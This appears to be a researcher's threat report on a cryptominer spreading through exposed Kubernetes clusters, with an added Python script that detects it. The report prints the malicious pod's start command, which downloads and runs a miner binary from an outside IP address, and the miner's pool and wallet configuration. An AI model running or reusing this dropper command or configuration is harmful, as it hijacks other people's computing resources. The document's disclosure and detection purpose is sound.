systems infected with miner for kubernetes

The following is appearing in 108 Kubernetes systems that I have tracked so far.

"containers": [
                    {
                        "command": [
                            "sh",
                            "-c",
                            "curl -o /var/tmp/config.json http://192.99.142.232:8220/2.json;curl -o /var/tmp/suppoie http://192.99.142.232:8220/rig;chmod 777 /var/tmp/suppoie;cd /var/tmp;./suppoie -c config.json"
                        ],
                        "resources": {},
                        "image": "centos",
                        "imagePullPolicy": "Always",
                        "terminationMessagePath": "/dev/termination-log",
                        "volumeMounts": [
                            {
                                "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount",
                                "readOnly": true,
                                "name": "default-token-gdcjb"
                            }
                        ],
                        "terminationMessagePolicy": "File",
                        "name": "myresd4"
                    }
                ]
                

The Command

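It uses a centos image and runs the following command on startup. The command downloads a miner configuration and a binary into /var/tmp, makes the binary executable, and runs it with that configuration: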

"command": [
                         "sh",
                         "-c",
                         "curl -o /var/tmp/config.json http://192.99.142.232:8220/2.json;curl -o /var/tmp/suppoie http://192.99.142.232:8220/rig;chmod 777 /var/tmp/suppoie;cd /var/tmp;./suppoie -c config.json"
                     ]
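
An added example, not part of the original gist: a Python check that scans the output of `kubectl get pods --all-namespaces -o json` for containers whose start command matches the pattern shown above. The function names, the generic download-plus-chmod heuristic and the sample pod names are assumptions; the two indicators are copied from the command on this page.

```python
import json
import re
import sys

# Indicators copied from the start command shown on this page.
PAGE_INDICATORS = ("192.99.142.232", "/var/tmp/suppoie")
# Assumed generic heuristic: a start command that downloads over HTTP and chmods a file.
DOWNLOAD = re.compile(r"\b(curl|wget)\b[^;|&]*\bhttps?://", re.I)
CHMOD = re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\b")

def container_findings(container):
    """Return the reasons a container's command line looks like a dropper."""
    line = " ".join((container.get("command") or []) + (container.get("args") or []))
    reasons = [f"indicator:{i}" for i in PAGE_INDICATORS if i in line]
    if DOWNLOAD.search(line) and CHMOD.search(line):
        reasons.append("download+chmod in start command")
    return reasons

def scan_pods(pod_list):
    """Scan a parsed pod list; return (namespace, pod, container, reasons) tuples."""
    hits = []
    for pod in pod_list.get("items", []):
        meta, spec = pod.get("metadata", {}), pod.get("spec", {})
        for c in (spec.get("initContainers") or []) + (spec.get("containers") or []):
            reasons = container_findings(c)
            if reasons:
                hits.append((meta.get("namespace"), meta.get("name"), c.get("name"), reasons))
    return hits

# Constructed sample: one pod carrying the command from this page, one benign pod.
MINER_CMD = ("curl -o /var/tmp/config.json http://192.99.142.232:8220/2.json;"
             "curl -o /var/tmp/suppoie http://192.99.142.232:8220/rig;"
             "chmod 777 /var/tmp/suppoie;cd /var/tmp;./suppoie -c config.json")
SAMPLE = {"items": [
    {"metadata": {"namespace": "default", "name": "pod-a"},  # constructed pod name
     "spec": {"containers": [{"name": "myresd4", "image": "centos",
                              "command": ["sh", "-c", MINER_CMD]}]}},
    {"metadata": {"namespace": "default", "name": "web"},    # constructed benign pod
     "spec": {"containers": [{"name": "nginx", "image": "nginx",
                              "command": ["nginx", "-g", "daemon off;"]}]}},
]}

if __name__ == "__main__":
    doc = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE
    for ns, pod, ctr, why in scan_pods(doc):
        print(f"{ns}/{pod} container={ctr}: {', '.join(why)}")
```

Save the cluster's pod list to a file and pass its path as the first argument to scan real data instead of the embedded sample.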
                     

The JSON miner configuration

http://192.99.142.232:8220/2.json 
{
 "algo": "cryptonight",  // cryptonight (default) or cryptonight-lite
 "av": 0,                // algorithm variation, 0 auto select
 "background": false,    // true to run the miner in the background
 "colors": true,         // false to disable colored output    
 "cpu-affinity": null,   // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
 "cpu-priority": 5,   // set process priority (0 idle, 2 normal to 5 highest)
 "donate-level": 1,      // donate level, mininum 1%
 "log-file": null,       // log all output to a file, example: "c:/some/path/xmrig.log"
 "max-cpu-usage": 95,    // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.  
 "print-time": 60,       // print hashrate report every N seconds
 "retries": 5,           // number of times to retry before switch to backup server
 "retry-pause": 5,       // time to pause between retries
 "safe": false,          // true to safe adjust threads and av settings for current CPU
 "threads": null,        // number of miner threads
 "pools": [
     {
         "url": "158.69.133.20:3333",   // URL of mining server
         "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",                        // username for mining server
         "pass": "x",                       // password for mining server
         "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
         "nicehash": false                  // enable nicehash/xmrig-proxy support
     },
     {
         "url": "192.99.142.249:3333",   // URL of mining server
         "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",                        // username for mining server
         "pass": "x",                       // password for mining server
         "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
         "nicehash": false                  // enable nicehash/xmrig-proxy support
     },
     {
         "url": "202.144.193.110:3333",   // URL of mining server
         "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",                        // username for mining server
         "pass": "x",                       // password for mining server
         "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
         "nicehash": false                  // enable nicehash/xmrig-proxy support
     }
 ],    
 "api": {
     "port": 0,                             // port for the miner API https://github.com/xmrig/xmrig/wiki/API
     "access-token": null,                  // access token for API
     "worker-id": null                      // custom worker-id for API
 }
}

Thanks

Thanks to the guys at @binaryedgeio for running some worldwide scans for me!
